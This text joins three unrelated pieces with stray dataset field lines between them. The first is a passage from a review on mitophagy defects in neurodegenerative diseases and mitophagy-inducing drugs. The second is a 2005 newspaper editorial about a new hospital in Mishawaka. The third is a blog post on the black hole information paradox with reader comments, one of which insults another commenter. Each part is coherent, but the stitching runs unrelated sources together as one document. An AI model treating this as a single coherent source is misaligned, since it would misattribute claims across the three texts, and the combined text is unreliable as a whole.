UCHL-1 and thus improper mitochondrial turnover \[[@B188-cells-09-00150]\]. Mitophagy suppression can restore synaptic mitochondrial density and partially, but significantly, protect against neuronal death induced by this NH2-htau. In contrast, another study proposed that human wild type tau (htau) is inserted into the mitochondrial membrane, thus inducing mitophagy impairment \[[@B189-cells-09-00150]\]. However, in a more recent study, both htau and htauP301L were shown to impair mitophagy in *Caenorhabditis elegans* (*C. elegans*) and neuroblastoma cells by reducing Parkin translocation onto mitochondria through a different mechanism. Instead of changes in the Δψ~m~ or the cytoskeleton, impaired Parkin recruitment to mitochondria is proposed to be caused by tau-mediated sequestration of Parkin in the cytosol \[[@B190-cells-09-00150]\]. Collectively, these data suggest that mitophagy is impaired under tauopathy conditions by distinct mechanisms. In addition to defects in mitophagic clearance in response to Aβ and tau-induced mitochondrial damage, a recent study reveals a marked decrease in the basal level of mitophagy in postmortem hippocampal tissues from AD patients, cortical neurons derived from AD-induced pluripotent stem cell (iPSC), as well as AD mouse models \[[@B191-cells-09-00150]\]. This study further demonstrates defects in the activation of ULK1 and TBK1, the autophagy proteins that mediate autophagy/mitophagy initiation, thus leading to impaired mitophagy function. Furthermore, pharmacological reinstallation of mitophagy mitigates amyloid and tau pathologies, resulting in beneficial effects against memory loss in these AD mice. Therefore, these data support the view that defective mitophagy is likely an early event in AD brains and plays a causative role in the development of AD-linked neuropathology \[[@B191-cells-09-00150]\]. Further studies using neurons derived from iPSCs of sporadic AD or other similar models could be very critical to addressing whether mitophagy dysfunction serves as a key player in Aβ/tau proteinopathies. 4.2. Mitophagy Defects in PD {#sec4dot2-cells-09-00150} ---------------------------- Dysfunctional mitophagy is closely linked to PD. Many PD-causing genes show the mitochondrial phenotypes \[[@B28-cells-09-00150],[@B137-cells-09-00150],[@B150-cells-09-00150],[@B192-cells-09-00150],[@B193-cells-09-00150],[@B194-cells-09-00150],[@B195-cells-09-00150],[@B196-cells-09-00150],[@B197-cells-09-00150]\]. In addition, PD patients have increased rates of mtDNA deletion in the substantia nigra, which further associates defective mitochondrial quality control with PD \[[@B198-cells-09-00150]\]. The important role for mitophagy in PD was first indicated from an ultrastructural study showing autophagic accumulation of mitochondria in neurons of the patients with PD and Lewy Body Dementia (LBD) \[[@B83-cells-09-00150]\]. Many other studies have demonstrated mitophagy abnormalities in a variety of experimental models representing genetic forms of toxic-environmental PD \[[@B67-cells-09-00150],[@B199-cells-09-00150],[@B200-cells-09-00150],[@B201-cells-09-00150],[@B202-cells-09-00150]\]. As previously discussed (see [Section 2.1](#sec2dot1-cells-09-00150){ref-type="sec"}), cell-based and mechanistic studies directly link PINK1 and Parkin to mitophagy. However, while loss-of-function mutations in *PARK6* (encoding PINK1) and *PARK2* (encoding Parkin) genes are linked to familial PD \[[@B203-cells-09-00150]\], the role of the PINK1-Parkin-dependent pathway in vivo remains elusive. The PINK1 and Parkin pathway has been extensively studied in *Drosophila*. Mutant flies show dopaminergic degeneration, reduced lifespan, and locomotive defects \[[@B28-cells-09-00150],[@B44-cells-09-00150],[@B204-cells-09-00150],[@B205-cells-09-00150],[@B206-cells-09-00150]\]. Muscle cells of mutant flies exhibited swollen mitochondria with disrupted cristae, coupled with muscle degeneration \[[@B206-cells-09-00150],[@B207-cells-09-00150],[@B208-cells-09-00150],[@B209-cells-09-00150]\]. *PARK6* KO rats showed dopaminergic loss and motor defects \[[@B210-cells-09-00150]\]. Importantly, both *Drosophila* and rat model systems show mitochondrial dysfunction. However, mice with the deletion of *PARK6* or *PARK2* do not exhibit robust substantial PD-relevant phenotypes \[[@B77-cells-09-00150],[@B79-cells-09-00150],[@B80-cells-09-00150],[@B81-cells-09-00150]\]. This might be due to compensations by other mechanisms that are sufficient enough to maintain neuronal homeostasis under physiological conditions. Strikingly, when crossing *PARK2* KO mice with Mutator mice characterized by accelerated acquisition of mtDNA mutations, the resulting phenotypes have mitochondrial defects as well as dopaminergic neuronal loss \[[@B211-cells-09-00150]\]. Thus, this observation suggests that Parkin-mutant mice are susceptible to increased mtDNA damage. Given that both impaired mitochondrial function and mitophagy deficit are the upstream of neurodegeneration, the lack of robust phenotypes in mice suggest that the PINK1-Parkin pathway might be dispensable under physiological conditions, yet still necessary in response to stress/pathological stimuli for the functional maintenance and survival of PD-related dopaminergic neurons. Aside from PINK1-Parkin-dependent mitophagy, increased cardiolipin-mediated mitophagy was proposed to play a role in α-syn-induced mitochondrial dysfunction \[[@B148-cells-09-00150]\]. 4.3. Mitophagy Defects in ALS {#sec4dot3-cells-09-00150} ----------------------------- Impaired mitophagy was proposed to be involved in the denervation of neuromuscular junctions in an ALS mouse model \[[@B212-cells-09-00150]\]. Additionally, lysosomal dysfunction has been implicated in ALS. A recent work has provided a strong evidence showing that lysosomal deficits play a critical role in autophagy/mitophagy dysfunction and mitochondrial pathology in a mutant SOD1 transgenic mouse model of ALS \[[@B213-cells-09-00150]\]. Lysosomal deficits result in abnormal accumulation of autophagic vacuoles (AVs) engulfing damaged mitochondria within motor neuron axons of mutant SOD1 mice. More importantly, rescuing autophagy-lysosomal deficits was shown to enhance mitochondrial turnover, improve motor neuron survival, and ameliorate disease phenotype in mutant SOD1 mice. Given that autophagy/mitophagy is a lysosome-dependent pathway, defective mitophagy and mitochondrial pathology in ALS are attributed to defects in lysosomal proteolysis. A more recent study uncovers that Parkin-dependent mitophagy is activated in the mutant SOD1 mouse model of ALS \[[@B214-cells-09-00150]\]. Mitophagy activation is known to induce Parkin-triggered and the UPS-mediated degradation of mitochondrial dynamics proteins Mfn2 and Mitochondrial Rho GTPase (Miro1) \[[@B42-cells-09-00150],[@B215-cells-09-00150],[@B216-cells-09-00150],[@B217-cells-09-00150],[@B218-cells-09-00150]\]. Consistently, increased mitophagy in the spinal cord of the mutant SOD1 mice is coupled with depletion of Parkin as well as mitochondrial dynamics proteins Mfn2 and Miro1 that are ubiquitinated by Parkin. Interestingly, genetic ablation of *PARK2* protects against muscle denervation and motor neuron loss and attenuates the depletion of mitochondrial dynamics proteins, which delays disease progression and prolongs life span in mutant SOD1 mice. Thus, the results from this study suggest that Parkin could be a disease modifier of ALS, and chronic activation of Parkin-dependent mitophagy augments mitochondrial dysfunction by depleting mitochondrial dynamics proteins. Consistently, several other studies also reported a significant reduction of Miro1 in spinal cord tissue of ALS patients and animal models \[[@B219-cells-09-00150]\]. Moreover, it was shown that Miro1 reduction induced by ALS-linked mutant SOD is dependent on Parkin \[[@B220-cells-09-00150]\]. Miro1 is known as a component of the adaptor-motor complex essential for KIF5 motors to drive anterograde transport of mitochondria along axons \[[@B8-cells-09-00150]\]. Miro1-knockout mice exhibit upper motor neuron degeneration \[[@B221-cells-09-00150]\]. Thus, ALS-linked mitochondrial trafficking defect is likely caused by Miro1 deficiency as a result of Parkin-dependent enhancement of Miro1 turnover \[[@B220-cells-09-00150]\]. Compromised mitophagy may also induce ALS. Many of the genes linked to ALS encode proteins that play a critical role in autophagy/mitophagy, including OPTN and p62, as well as their kinase TBK1 \[[@B222-cells-09-00150],[@B223-cells-09-00150],[@B224-cells-09-00150]\]. However, it is poorly understood how the mutations in these genes are involved in the ALS pathology. Given the phosphorylation of OPTN and p62 by TBK1 to activate autophagy/mitophagy, aberrant accumulation of misfolded proteins and protein aggregates along with impaired mitochondrial turnover may both contribute to ALS-linked mitochondrial dysfunction and motor neuron death. Illuminating the role of these proteins in vivo will be critical in dissecting the molecular and cellular mechanisms leading to axonal degeneration and motor neuron loss. 4.4. Mitophagy Defects in HD {#sec4dot4-cells-09-00150} ---------------------------- Mitochondrial dysfunction and autophagy failure have been linked to the pathogenesis of HD. Mutant Htt is known to be associated with mitochondria and to mediate mitochondrial damage. Defective mitophagy may also be involved in mitochondrial defects in HD. Decreased levels of the basal mitophagy were shown in the dentate gyrus of HD mice crossed with the mito-Keima mouse line \[[@B76-cells-09-00150]\]. In addition to its role in catalyzing the sixth step of glycolysis, a recent study proposed that GAPDH functions in micro-mitophagy---the direct engulfment of injured mitochondria by lysosomes \[[@B225-cells-09-00150]\]. In HD cell models, abnormal interaction of long polyQ tracts with mitochondrial GAPDH impairs GAPDH-mediated mitophagy, leading to mitochondrial dysfunction and increased cell death. Additionally, mutant Htt can interact with and affect the autophagy machinery \[[@B226-cells-09-00150]\]. A primary defect in the ability of autophagosomes to recognize and recruit cytosolic cargoes was reported in HD cells, leading to inefficient autophagic engulfment of substrates including mitochondria. Such a defect contributes to HD-associated accumulation of abnormal mitochondria \[[@B227-cells-09-00150]\]. Moreover, Htt was proposed to act as a scaffold protein for autophagy through the physical interaction of Htt with p62 and ULK1 proteins. This interaction allows Htt to facilitate p62-mediated cargo recognition efficiency, in particular, associating Lys-63-linked ubiquitin-modified substrates with LC3-II---the integral component of phagophore or isolation membranes. Thus, this study supports the possibility that polyQ expansion might compromise the role of Htt in autophagy \[[@B228-cells-09-00150]\]. Given the evidence for HD-linked autophagy impairment and mitophagic pathology, investigations into mitophagy status as well as detailed mechanisms are important for better understanding of HD pathogenesis. 5. Mitophagy-Targeted Therapeutic Interventions {#sec5-cells-09-00150} =============================================== From the above stated, it is clear that mitochondrial damage is a hallmark of major neurodegenerative diseases. Pharmacological agents that induce mitophagy with a goal of enhancing clearance of damaged mitochondria could be a promising strategy for achieving a significant therapeutic benefit \[[@B7-cells-09-00150],[@B98-cells-09-00150],[@B229-cells-09-00150],[@B230-cells-09-00150]\]. Several mitophagy inducers, including NAD^+^ precursors, urolithin A (UA), the antibiotic actinonin (AC), and spermidine \[[@B231-cells-09-00150],[@B232-cells-09-00150]\], have been examined and shown significant benefits in enhancing mitophagy, increasing mitochondrial resistance to oxidative stress, prolonging health span, and for neuronal protection in disease animal models and/or human cells. The levels of NAD^+^ are reduced in AD animal models, and elevation of cellular NAD^+^ levels through supplementation with NAD^+^ precursors such as nicotinamide, nicotinamide mononucleotide (NMN), and nicotinamide riboside (NR) is found to attenuate Aβ and tau pathologies and protect against cognitive dysfunction \[[@B233-cells-09-00150]\]. Such beneficial effects are attributed to the enhancement of the NAD^+^-dependent SIRT1 and SIRT3, expression of the transcription factor CREB, and enhanced activities of PI3K-Akt and MAPK/ERK1/2 \[[@B191-cells-09-00150],[@B233-cells-09-00150],[@B234-cells-09-00150],[@B235-cells-09-00150],[@B236-cells-09-00150]\]. Additionally, NAD^+^ replenishment was also shown to restore mitochondrial function and thus ameliorate dopaminergic neuron loss in iPSC and *Drosophila* models of PD \[[@B237-cells-09-00150]\]. These observations collectively indicate that the interventions to sustain NAD^+^ levels might be beneficial for AD and PD patients. UA is an ellagitannins-derived metabolite, and can effectively induce neuronal mitophagy in both *C. elegans* and mouse brains \[[@B191-cells-09-00150]\]. Both UA and AC-mediated mitophagy activation is dependent on PINK1, Parkin, and NIX, and was shown to attenuate AD pathologies, inflammation, and learning and memory deficits \[[@B191-cells-09-00150]\]. Polyamines, including spermidine, can increase autophagy activity through affecting autophagy-related gene expression as well as enhance mitophagy through the mechanisms of mammalian target of rapamycin (mTOR) inhibition and 5′ AMP-activated protein kinase (AMPK) activation \[[@B232-cells-09-00150],[@B238-cells-09-00150]\]. Moreover, spermidine was shown to activate the Ataxia-Telangiesctasia mutated (ATM)-dependent PINK1/Parkin signaling. Treatment with spermidine can lead to memory improvement and prolonged life span observed in *C. elegans*, *Drosophila*, and mice \[[@B231-cells-09-00150],[@B239-cells-09-00150]\]. Other pharmacological strategies to enhance mitophagy through inducing mild bioenergetic stress or inhibiting mTOR activity have also been proven to be beneficial in either delaying or treating AD. Mitochondrial uncoupling agents such as 2,4-dinitrophenol (DNP) were reported to stimulate autophagy and preserve neuronal function in AD animal models \[[@B240-cells-09-00150]\]. Through inducing mild bioenergetic stress and stimulating ketogenesis, 2-deoxyglucose treatment was found to protect neurons against degeneration in a mitochondrial toxin-based PD model \[[@B241-cells-09-00150]\], as well as enhance mitochondrial function and stimulate autophagic clearance of Aβ \[[@B242-cells-09-00150]\]. The mTOR inhibitor rapamycin-mediated enhancement of autophagy/mitophagy and AMPK activation can induce mitochondrial clearance in a number of model organisms, including *C. elegans*, *Drosophila*, and mice \[[@B243-cells-09-00150],[@B244-cells-09-00150]\]. Rapamycin was also shown to reduce Aβ pathology and ameliorate cognitive dysfunction in a mutant APP transgenic mouse model \[[@B245-cells-09-00150]\]. Similar to rapamycin, metformin can also stimulate mitophagy through inhibitions of mTOR and complex I activities and activations of AMPK, SIRT1, and Parkin-dependent mitophagy \[[@B246-cells-09-00150],[@B247-cells-09-00150],[@B248-cells-09-00150]\]. Therefore, these observations collectively provide a strong rationale for future research into the compounds that can enhance mitophagy in AD models, such as UA, AC, and spermidine \[[@B76-cells-09-00150],[@B249-cells-09-00150],[@B250-cells-09-00150]\]. In addition, mitophagy enhancement through activation of Parkin could be another promising strategy in some disease models. Nilotinib was originally identified as a tyrosine kinase inhibitor, and was recently reported to increase Parkin abundance and ubiquitination potentially through enhancing Parkin recycling via the proteasome system \[[@B251-cells-09-00150]\]. Nilotinib-mediated c-ABL inhibition can also prevent tyrosine phosphorylation of Parkin, leading to the release of Parkin auto-inhibition status. Such a mechanism was demonstrated to be protective in PD models \[[@B252-cells-09-00150]\]. Moreover, chronic treatment with nilotinib in APP transgenic mice can enhance Aβ clearance through increasing the interaction of Parkin with Beclin 1 \[[@B253-cells-09-00150]\]. As for ALS and FTD, nilotinib treatment was also reported to mitigate motor and cognitive deficits in TDP-43 transgenic mice \[[@B254-cells-09-00150]\]. 6. Concluding Remarks {#sec6-cells-09-00150} ===================== Mitochondrial health is vital for cellular and organismal homeostasis, and mitochondrial defects have long been linked to the pathogenesis of neurodegenerative diseases such as AD, PD, ALS, HD, and others. However, it is still unclear whether cellular mechanisms required for the maintenance of mitochondrial integrity and function are deficient in these diseases, thus exacerbating mitochondrial pathology. The quality control of mitochondria involves multiple levels of strategies to protect against mitochondrial damage and maintain a healthy mitochondrial population within cells. In neurons, mitophagy serves as a major pathway of the quality control mechanisms for the removal of aged and defective mitochondria through lysosomal proteolysis. The molecular and cellular mechanisms that govern mitophagy have been extensively studied in the past decade. However, mitophagy deficit has only been recognized recently as a key player involved in aging and neurodegeneration. Given the fact that mitochondrial deficit is clearly linked to neuronal dysfunction and the exacerbation of disease defects, protection of mitochondrial function could be a practical strategy to promote neuroprotection and modify disease pathology. Mitochondrially targeted antioxidants have been proposed. In particular, the antioxidant MitoQ, a redox active ubiquinone targeted to mitochondria, has been examined and demonstrated to have positive effects in multiple models of aging and neurodegenerative disorders \[[@B255-cells-09-00150],[@B256-cells-09-00150],[@B257-cells-09-00150],[@B258-cells-09-00150]\]. Importantly, mitophagy could be another promising target for drug discovery strategy. Therefore, further detailed studies to elucidate mitophagy mechanisms not only advance our understanding of the mitochondrial phenotypes and disease pathogenesis, but also suggest potential therapeutic strategies to combat neurodegenerative diseases. The authors thank L. Turkalj and J. Cheung for editing and other members of the Cai laboratory for their assistance and discussion. In addition to the cited references in the manuscript, we apologize for not being able to include and discuss other relevant studies due to the space limitation. Q.C. conceived ideas and wrote the manuscript. Y.Y.J. contributed to some sections related with AD. Q.C. is responsible for funding acquisition. All authors have read and agreed to the published version of the manuscript. This work was funded by the National Institutes of Health (NIH) grants NS089737 and NS102780. The authors declare no conflict of interest. ![The mitophagy pathways. Upon mitochondrial damage, mitophagy can be induced through three major mechanisms: ubiquitin-mediated mitophagy including PTEN-induced putative kinase protein 1 (PINK1)-Parkin-dependent mitophagy, outer mitochondrial membrane (OMM) receptor-mediated mitophagy, and lipid-mediated mitophagy. (**a**) PINK1-Parkin-mediated mitophagy initiates with PINK1 stabilization on the OMM of damaged mitochondria to recruit Parkin, an E3 ubiquitin ligase. Phospho-ubiquitination of substrates on the OMM by PINK1/Parkin recruits the autophagy machinery and thus promotes the engulfment of damaged mitochondria by growing phagophore or isolation membranes. (**b**) Other E3 ubiquitin ligases have been reported to regulate mitophagy independent of PINK1 and Parkin. MUL1 has similar substrates to Parkin and can directly bind to GABAA receptor-associated protein (GABARAP), suggesting that MUL1 can function independently to facilitate autophagic engulfment. (**c**) Several autophagy receptors are anchored within the OMM, including NIP3-like protein X (NIX; also known as BNIP3L), FUN14 domain containing 1 (FUNDC1), and FK506 Binding Protein 8 (FKBP8). Binding of NIX/BNIP3L or FUNDC1 to LC3 or GABARAP on the phagophore mediates targeting dysfunctional mitochondria for autophagy. (**d**) Externalization of cardiolipin, normally found in the inner mitochondrial membrane (IMM) phospholipid, to the OMM is a unique mechanism for lipid-mediated mitophagy. Cardiolipin initiates mitophagy through its direct interaction with LC3.](cells-09-00150-g001){#cells-09-00150-f001} ![Neuronal mitophagy. Upon mitochondrial membrane potential (Δψ~m~) dissipation, Parkin is recruited to depolarized mitochondria, triggering mitochondrial engulfment by autophagosomes. Parkin-targeted mitochondria accumulate in the somatodendritic regions of neurons. Such compartmental restriction is attributed to altered mitochondrial motility along axons, as evidenced by decreased anterograde transport and relatively increased retrograde transport of mitochondria. This spatial process allows neurons to efficiently remove damaged mitochondria from axonal terminals and facilitate mitophagic clearance in the soma, where mature lysosomes are mainly located. Studies have also shown that autophagosomes containing engulfed mitochondria move in an exclusively retrograde direction from distal axons toward the soma for maturation and for more efficient cargo degradation within acidic lysosomes in the soma. Figure is modified from \[[@B2-cells-09-00150]\].](cells-09-00150-g002){#cells-09-00150-f002} ![Neurodegenerative disease-associated mitochondrial toxicity. Misfolded proteins, oligomers, protein aggregates, or fibrils linked to major neurodegenerative diseases induce mitochondrial abnormalities, leading to increased reactive oxygen species (ROS) levels, loss of mitochondrial membrane potential (Δψ~m~), decreased oxidative phosphorylation (OXPHOS) and ATP production, impaired Ca^2+^ buffering, and enhanced mitochondrial DNA (mtDNA) changes. Moreover, impairments in mitochondrial dynamics and trafficking as well as mitophagy result in excessive mitochondrial fission and fragmentation and aberrant accumulation of dysfunctional mitochondria, all of which collectively contribute to synaptic dysfunction, axonal degeneration, and neuronal death.](cells-09-00150-g003){#cells-09-00150-f003} ![Mitophagy defects in neurodegenerative diseases. A growing body of evidence indicate that mitophagy function is impaired in major neurodegenerative diseases. In Alzheimer's disease (AD), robust activation of Parkin-mediated mitophagy was observed in patient brains of familiar and sporadic AD and the cell and animal models. However, under tauopathy conditions, excessive or defective Parkin-dependent mitochondrial turnover was reported in different studies, respectively. In addition, impaired lysosomal proteolysis and reduced levels of the basal mitophagy collectively contribute to mitophagy dysfunction in AD. In Parkinson's disease (PD), PINK1-Parkin-dependent mitophagy is necessary for the function and survival of PD-related dopaminergic neurons in response to stress/pathological stimuli. The role for increased cardiolipin-mediated mitophagy in mutant α-syn-induced mitochondrial dysfunction has also been proposed. As for amyotrophic lateral sclerosis (ALS), enhanced Parkin-mediated mitophagy was demonstrated in an ALS mouse model. Mitophagy defects and mitochondrial pathology are also attributed to lysosomal deficit in ALS affected motor neurons. In Huntington's disease (HD), decreased basal levels of mitophagy, defects in autophagic recognition and recruitment of damaged mitochondria, and impaired GAPDH-mediated micro-mitophagy lead to pathological mitophagy and mitochondrial dysfunction.](cells-09-00150-g004){#cells-09-00150-f004}
null
minipile
NaturalLanguage
mit
null
No good would come from medical split December 23, 2005 OUR OPINION We hope that Saint Joseph Regional Medical Center's plan to build a new hospital on the north side of Mishawaka does not end up splitting the medical community as some local health officials fear. Having most local physicians on the staffs at both Saint Joseph and Memorial Hospital is a convenience, both for the physicians and their patients. Physicians are familiar with both hospitals, know each one's strengths and can visit their inpatients daily. Patients can go to the hospital of their choice and still be attended by their primary care physician. However, it appears some physicians may not relish the idea of having to drive an additional five miles to get to the new Saint Joseph campus at Edison Lakes. We believe that attitude is not in the best interests of the overall health of this community. Physicians who no longer are an active member of a hospital's staff cannot tend to a patient. In most of those instances a patient's care is turned over to an in-house doctor, referred to as a hospitalist. But there is no way a hospitalist, no matter how qualified and professional, can know a patient as intimately as a primary care physician. And there are some doctors locally who are less than impressed with such a practice. We believe physicians will want to practice at the new hospital once construction is completed in mid-2009. The new Saint Joseph Regional Medical Center will be paperless and wireless, meaning information about patients can be moved around more efficiently. We think that new physical structure, accompanied by other amenities, will be an attraction to doctors. But more than a new facility, we think patients deserve to have access to the same type of medical care they have come to expect. That includes most physicians serving on the staffs of both hospitals. It is that kind of care that has set this community apart. It should continue without interruption.
null
minipile
NaturalLanguage
mit
null
Conservative solutions to the black hole information problem which provides a classification of solution attempts to the black hole information loss problem. As a warm-up, I recommend you read my post on the Black Hole Information Loss Paradox. You will notice that in this earlier post the basic argument of the paper is already outlined. The paper just makes the definitions more precise, and discusses the options one has to solve the problem based on how radical departures from semi-classical gravity they require. Not to mention that the paper has a lot of nice figures. We have made some effort to make the paper understandable for a broad audience, so don't be shy and download the full thing. The Core of the Problem: The Singularity The essence of the argument is the following: A singularity is something you don't want to cross your path. Why? Because infinities are dangerous. They crunch and destroy things, they literally set an end to existence, and in doing so they are indifferent as to what exactly crossed their way. A singularity is always singular. Infinity is always infinity. As such, crossing a singularity is an irreversible process. The problem is that once an initial state ended up being singular, you can't figure out what it looked like originally. The problem with black hole information is that evolution is not unitary if you believe that the initial state of the black hole gets converted mostly into thermal radiation to excellent precision. Non-unitarity is generally considered an unappealing property because it is in conflict with quantum mechanics and can cause all kinds of nasty side-effects you don't want. But an evolution that is not reversible cannot be unitary. Reversibility is not a sufficient, but a necessary condition for unitarity. However, since irreversibility is a characteristic of the presence of singularities, first thing you want to allow for a unitary evolution is to remove the singularity. Classically, this singularity is unavoidable. But we know that close to the singularity the curvature gets very strong (into the Planckian regime) and classical General Relativity (GR) is no longer valid. It should be replaced by a more fundamental theory that can be expected to remove the singularity, though the details are not well understood today. The paper offers a generalization of the classical singularities in GR that can be used for spacetimes that might have quantum gravitational regions. Throughout the paper we have tried not to make any specific assumptions about the unknown fundamental theory. The problem with the classical definition of geodesic completeness is that the notion of a geodesic, which relies on the presence of a metric, might not make sense any longer in the presence of strong quantum gravitational effects. The definition we are suggesting is motivated by the classical definition, and is then what I outlined above: a space-time is non-singular if evolution is time-reversible. It then follows trivially that a singular space-time generically suffers from information loss. Thus, a black hole space-time without information loss can not be singular in the so defined sense. If you want to understand what happens to the black hole information, first thing you should do is thus to get rid of the singularity. It is honestly a mystery to me why some people are so obsessed with the black hole horizon, believing that the horizon is the problem. The horizon is not where information gets destroyed. It is merely some surface where the information becomes irretrievable from the outside. Not to mention that the horizon can be at arbitrarily small background curvature. One thus shouldn't expect any quantum gravitational effects to be relevant at the horizon, and no reason to seek a solution there. Radical and Conservative Solutions Removing the singularity removes an obstacle to unitary evolution, but it doesn't explain how information survives. In the paper we discuss the possibilities one has if one just accepts that quantum gravitational effects are negligible until the very endstate of the evaporation. These solutions we have dubbed “conservative” . Everything else that requires non-locality on horizon scales or quantum gravitational effects in the weak curvature regime and so on, we have called “radical”. The conservative solutions can be classified into three cases. In all of them it is assumed the singularity is removed by quantum gravitational effects: The information is released in the final Planck phase, in which case there never is a real event horizon (in the paper, that's option 3). The information survives in a baby universe that disconnects from our universe ( option 4A). The information survives in a permanent, massive remnant (option 4B). Most importantly, conservative solutions imply that the endstate of black hole evaporation - when the black hole has about Planck mass and Planck size - carries a (potentially arbitrarily large) amount of information. The reason is simply that, if one accepts that the semi-classical approximation holds, Hawking radiation does not carry any information (except its temperature). Thus, the information has to remain inside. We thus have an endstate that must be able to store a large amount of information, even though it has a small surface area. This speaks in particular for the surface-interpretation of the black hole entropy. Objects with these properties are known to be possible in General Relativity, we have discussed such “bags of gold” and “monsters” in a recent post. The three above mentioned possible cases have been discussed for some while in the literature until some time in the mid 90s. There are some objections to all of them that we address in the paper. All in all, though valid objections, they are not terribly convincing. It is thus puzzling to some extend why there hasn't been more effort invested in what seem to be the most straightforward outcomes of black hole evaporation. Unfortunately, I have had many times the impression these conservative solutions were abandoned prematurely for the sake of creating more fanciful radical solutions, for not say, absurd speculations. A note on the definition of singularities we are using: If one had a fundamental theory to describe spacetime in the regions with strong quantum graviational effects, one could consider other notions of singular spacetimes, for example by using divergence of operators describing the background curvature or likewise. Then there arises the question how this definition would coincide with the one we have been using. One could imagine cases where they do not. Eg, the information of fields propagating in the background might not be sensitive to a curvature singularity, or the singularity itself could encode information. Bottomline The sane thing to do is to stick with conservative options until we are sure it's a no-go. That requires in particular understanding the properties of Planck-sized quantum graviational objects with high entropy. 210 comments: Thanks so much for expanding the explanation of your paper. It does go a long way to increasing my understanding of what you’re proposing. I must say that I agree that the removing of the singularity seems to be a priority since no physical theory has advanced very far when faced with infinities that resist being discarded or rather a method found to work around them, such as renormalization represents as being in the advances of quantum theory such as quantum electrodynamics and all the other advances since. “It is honestly a mystery to me why some people are so obsessed with the black hole horizon, believing that the horizon is the problem. The horizon is not where information gets destroyed. It is merely some surface where the information becomes irretrievable from the outside.” The above was one of my favourite statements for I too have often wondered what all the fuss about the horizon was. It amounts to imagining that an efficient thermos bottle has serious consequences in relation to the second law, since we can’t observe or be certain of the temperature of its contents. As far as I’m concerned the event horizon represents to be no more then the most ideal bottle. With or without Hawking radiation it’s arbitrary to consider what’s inside the horizon to not being part of the system. Even in the classical view if one was to pass through it and look back the universe would be visible to remain, although the rate of its evolution relatively hastened. So how does this suggest a detachment as only reaching the singularity could accomplish that. In the end like has been demonstrated in the standard model there are different stages in the resistance to gravitational collapse and I see this last one as being no different, just not understood to be explained. The one thing they share in common is that they are all dependant on the initial mass and the time required to evolve. My crude way of looking at it (and perhaps naïve)is the only way to end up with an infinity is to begin with one. In this case that would be to say that the only way to realize an infinite density is to begin with infinite mass. Bee - It is honestly a mystery to me why some people are so obsessed with the black hole horizon, believing that the horizon is the problem. Maybe it's because the existence of the horizon is what removes information from our universe. No horizon, no paradox. You could blame it on the singularity, but what's the point if singularities probably don't exist? The horizon is only non-special for an observer already committed to passing through it - the free falling observer. For an observer capable of getting close and then retreating, it's a hell whose temperature (due to the Hawking effect) is asymptotic to infinity. Isn't that true? Sorry I forgot to add that my favourite scenario is that through Hawkings’ mechanism or something else that all the classical entropy (heat) be allowed to escape (return) leaving what remains to have between itself and what’s released as potential. That’s because it is potential that amounts to be the driving force of any system. So in this way perhaps black holes are the realization of Maxwell’s demon that permits a continuance of it all. when I said that every fermion could be a bag of gold I thought, primarily, on the electron. When you renormalize a charge, you can say that a screening of virtual electrons that shields your detector from finding an infinite charge. But, if you are really close to an electron, well, you avoind the shielding and one finds a so strong EM field that you might find a mini black hole. So, instead of saying that you find a black hole, why not a bag of gold with a very strong EM field traped inside? You'd get the concepts of chage without relying on charge. Make the bag of gold spin, you get spin. I don't know if that is feasible. But it would be interesting to think about something similar to geometrodynamics, but without resourting to little wormholes, but as defects with almost-trapped surfaces that could actualy trap fields. I though of this when I saw that one could find the residual of a black hole as a kind of bag of gold which is a kind of defect in space time which traps fields. There are ways to produce charges without charge. Check the last pages of Frank Wiczek article,http://arxiv.org/abs/0812.5097 in which he also references this articlehttp://www.theory.caltech.edu/~preskill/ph219/topological.pdf Yes, your paper with Smolin is a good one, for two reasons: first, the emphasis on *reversibility*, reminding us that the problem really is a thermodynamic one in some sense; and second, the gentle reminder that claims that the solution is to be sought near the event horizon are "not conservative" --- which is a polite way of saying "completely ridiculous". However, here are two answers to your [or Lee Smolin's] question, namely: why hasn't the obvious solution [essentially, baby universes born inside black holes, as in cosmic natural selection] been followed up? The first reason is that nobody really knows *how* to follow it up! The second, and much better, reason, is that there are very good reasons to think that baby universes [of this kind, ie born inside black holes] won't be like ours --- they won't begin in a state of low entropy. So it's hard to see what use they are for explaining anything in *our* universe, apart from solving the information loss problem. ps: as I said in your "monster" post, there are reasons to think that bags of gold don't exist in string theory. So that is an argument against remnants from a string point of view. pps: You only mentioned Horowitz and Maldacena in passing, but I think that their idea deserves a lot more attention. It has been generally dismissed for very inadequate reasons. All your conservative solutions macroscopically violate Einstein's equations, even in regions where the curvature is very low. Whether or not the singularity is "infinite" or not is completely irrelevant for the information loss puzzles. Even if it is regulated at short distances, which is how most people imagine it anyway (and the information questions really have nothing to do with the question whether this visualization is correct), the information gets destroyed there simply because there is no future-directed timelike trajectory from the vicinity of such a singularity to the exterior spacetime. The (semiclassical) destruction becomes inevitable at the moment of crossing horizon, for purely causal reasons, and trying to "solve" the information loss puzzle afterwords is simply too late. Also, all the black hole information can't get away in the "last Planckian moment", or something like that. What does this option even mean for a large black hole? Should the black hole remember that it once used to be large, and recall all the information from those good old times when it was large, and emit all the information from those old times? What if it had some life before it as well? Should it remember the state from the beginning of the Universe? It makes no sense. Also, there are no numerous remnants because they would completely spoil the spectrum of the theory and would be produced generically. Baby Universe may look different for the infalling observers but they still look like remnants to the exterior world, so it is correct that you included them in the same category. This category is excluded, too. The macroscopic description of spacetime must clearly reproduce the diagram in your option (1), the only conservative solution, the only solution that macroscopically agrees with Einstein's equations, and the only solution that you don't call "conservative". What you're writing is just completely weird. Note that capitalist pig is doing everything he can throughout his life to be against me and with my foes but he can hardly hide that he is beginning to understand these basic issues about the (ir)relevance of the horizon and singularity, too. The corect solution is macroscopically (1) except that there are tiny "tunneling" effects that can imprint the detailed microstate into the Hawking radiation - fingerprints that are not visible semiclassically or in the whole perturbative expansion, for that matter. why hasn't the obvious solution [essentially, baby universes born inside black holes, as in cosmic natural selection] been followed up? The first reason is that nobody really knows *how* to follow it up! The second, and much better, reason, is that there are very good reasons to think that baby universes [of this kind, ie born inside black holes] won't be like ours --- they won't begin in a state of low entropy. So it's hard to see what use they are for explaining anything in *our* universe, apart from solving the information loss problem. Well, I am not a huge fan of the baby universe solution, but I think you are confusing two different things here. The baby universes in the sense we have discussed them in the paper are indeed not like our universe. To begin with, they are closed. And yes, they generically have a large entropy. But they are not supposed to be like our universe - I think you might have CNS in mind, but we haven't tried to make an argument about that. Yes, the use they have is they provide one solution to the information loss problem. I like the Horowitz and Maldacena idea, but their motivation could be stronger. I am sure we will hear more about that. Well, you don't need an infinite mass to create an infinite density. You just have to 